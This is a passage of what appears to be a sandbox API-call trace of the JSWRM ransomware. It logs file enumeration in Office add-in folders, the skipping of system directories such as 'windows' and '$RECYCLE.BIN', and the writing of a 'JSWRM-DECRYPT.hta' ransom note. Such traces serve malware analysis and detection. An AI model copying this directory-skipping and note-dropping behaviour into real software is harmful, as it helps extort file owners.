ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.278] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.278] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.278] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4023325f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4023325f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4023325f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.278] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.278] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.278] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.278] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.278] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.278] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.278] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.278] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.278] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.278] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0123.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0123.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0123.278] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1a2a905, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1a2a905, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1a2a905, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.278] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.278] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.278] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.278] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.278] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.278] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.279] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.279] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.279] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.279] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0123.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0123.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0123.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0123.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244e58 [0123.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.279] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6224b6a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6224b6a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x26aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.279] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.279] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.279] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.279] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.279] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.279] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.279] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.279] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.279] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.279] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0123.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0123.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0123.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0a0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0123.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x2455a8 [0123.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244e58 | out: hHeap=0x1e0000) returned 1 [0123.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.280] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbe60d8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbe60d8f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbe60d8f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x31040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.280] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.280] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.280] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.280] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.280] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.280] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.280] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.280] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.280] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.280] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0123.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0123.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0123.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0123.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244ab0 [0123.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2455a8 | out: hHeap=0x1e0000) returned 1 [0123.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.280] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xffd42fe2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffd42fe2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffd6924a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x88aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.280] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.281] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.281] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.281] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.281] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.281] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.281] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.281] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.281] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.281] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0123.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22ce70, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0123.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0123.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0123.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f848 [0123.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244ab0 | out: hHeap=0x1e0000) returned 1 [0123.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.281] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xffd42fe2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffd42fe2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffd6924a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x88aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0123.281] FindClose (in: hFindFile=0x231f40 | out: hFindFile=0x231f40) returned 1 [0123.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0123.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0123.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.282] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0822be8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="nl", cAlternateFileName="")) returned 1 [0123.282] lstrcmpiW (lpString1="nl", lpString2=".") returned 1 [0123.282] lstrcmpiW (lpString1="nl", lpString2="..") returned 1 [0123.282] lstrcmpiW (lpString1="nl", lpString2="...") returned 1 [0123.282] lstrcmpiW (lpString1="nl", lpString2="windows") returned -1 [0123.282] lstrcmpiW (lpString1="nl", lpString2="recovery") returned -1 [0123.282] lstrcmpiW (lpString1="nl", lpString2="perflogs") returned -1 [0123.282] lstrcmpiW (lpString1="nl", lpString2="documents and settings") returned 1 [0123.282] lstrcmpiW (lpString1="nl", lpString2="$RECYCLE.BIN") returned 1 [0123.282] lstrcmpiW (lpString1="nl", lpString2="system volume information") returned -1 [0123.282] lstrcmpiW (lpString1="nl", lpString2="msocache") returned 1 [0123.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0123.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.282] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\nl\\jswrm-decrypt.hta")) returned 0xffffffff [0123.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0123.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0123.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0123.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0123.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\nl\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.284] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.284] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.285] CloseHandle (hObject=0x338) returned 1 [0123.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0123.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b480 [0123.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 